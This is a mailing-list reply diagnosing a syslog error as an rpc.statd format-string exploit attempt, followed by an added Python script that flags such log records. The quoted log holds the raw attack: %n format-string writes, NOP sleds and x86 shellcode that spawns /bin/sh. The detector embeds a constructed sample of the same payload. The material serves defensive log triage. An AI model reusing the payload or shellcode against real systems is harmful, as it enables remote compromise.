
Re: nfs-common



Brock Murch wrote:

> I have been getting this error every so often in the syslog:
>
> Is this an nfs-common bug, or a syslogd bug?
>
> running:
>
> Linux brockwell 2.2.17 #2 Thu Sep 14 06:08:37 EDT 2000 i486 unknown
>
> all packages from the stable upgrade of that time.

To me this seems to be an exploit attempt; all the <90> translate to a nop in x86 asm...

> Jan 18 19:16:45 brockwell
> Jan 18 19:16:45 brockwell syslogd: Cannot glue message parts together
> Jan 18 19:16:45 brockwell 173>Jan 18 19:16:45 /sbin/rpc.statd[165]:
> gethostbyname error for ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF>
> <BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n<90>
>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
>

[...]

>
>
> f<CD>
> Jan 18 19:16:45 brockwell
> <C7>^F/bin<C7>F^D/shA0<C0><88>F^G<89>v^L<8D>V^P<8D>N^L<89><F3><B0>^K<CD><80><B0>^A<CD><80><E8>^?<FF><FF>
>

...look at the row above, "/bin/sh": not a bug in your daemon, but instead a clear attempt to spawn a shell, probably with a buffer overflow.


Andrea
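
A log-triage check for the indicators visible in this thread (the `%n` conversions, the `<90>` runs, the repeated `<F7><FF><BF>` words and the `/bin` ... `/sh` strings), added here as an example and not part of the original messages. The function names, the `min_nops` threshold and both sample lines are assumptions constructed for illustration.

```python
import re

# The pasted log shows raw bytes as <XX> (hex) and ^C (caret notation).
# A literal "^A" or "<41>" typed in a message would decode the same way,
# which is acceptable for triage.
_ESC = re.compile(r"<([0-9A-Fa-f]{2})>|\^([@-_?])")

def unescape(text: str) -> bytes:
    """Turn the <XX> / ^C escapes seen in the log back into raw bytes."""
    out, pos = bytearray(), 0
    for m in _ESC.finditer(text):
        out += text[pos:m.start()].encode("latin-1", "replace")
        if m.group(1):
            out.append(int(m.group(1), 16))
        else:
            out.append(0x7F if m.group(2) == "?" else ord(m.group(2)) ^ 0x40)
        pos = m.end()
    out += text[pos:].encode("latin-1", "replace")
    return bytes(out)

def triage(record: str) -> dict:
    """Count the indicators visible in the post for one reassembled record."""
    data = unescape(record)
    return {
        # %n-style conversions write to memory; a hostname never needs them
        "format_writes": len(re.findall(rb"%(?:\d+\$)?[hl]*n", data)),
        # 0x90 is the x86 NOP the reply points out
        "longest_nop_run": max(map(len, re.findall(rb"\x90+", data)), default=0),
        # little-endian words of the form 0xbfffXXXX, as in ^X<F7><FF><BF>
        "stack_like_words": len(re.findall(rb"[\x00-\xff]{2}\xff\xbf", data)),
        "shell_path": b"/bin" in data and b"/sh" in data,
    }

def is_suspicious(record: str, min_nops: int = 16) -> bool:
    f = triage(record)
    return (f["format_writes"] > 0 or f["longest_nop_run"] >= min_nops
            or (f["shell_path"] and f["stack_like_words"] > 0))

# Constructed sample, abridged from the pattern quoted in the thread.
SAMPLE = ("Jan 18 19:16:45 host /sbin/rpc.statd[165]: gethostbyname error for "
          "^X<F7><FF><BF>^X<F7><FF><BF>%8x%8x%236x%n%137x%n" + "<90>" * 40
          + "<C7>^F/bin<C7>F^D/sh")
# Constructed benign line: the same daemon failing to resolve an ordinary name.
BENIGN = "Jan 18 19:20:01 host /sbin/rpc.statd[165]: gethostbyname error for fileserver01"

if __name__ == "__main__":
    for rec in (SAMPLE, BENIGN):
        print(is_suspicious(rec), triage(rec))
```

Because syslogd split the original message ("Cannot glue message parts together"), join the fragments of one record into a single string before passing it to `triage`.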


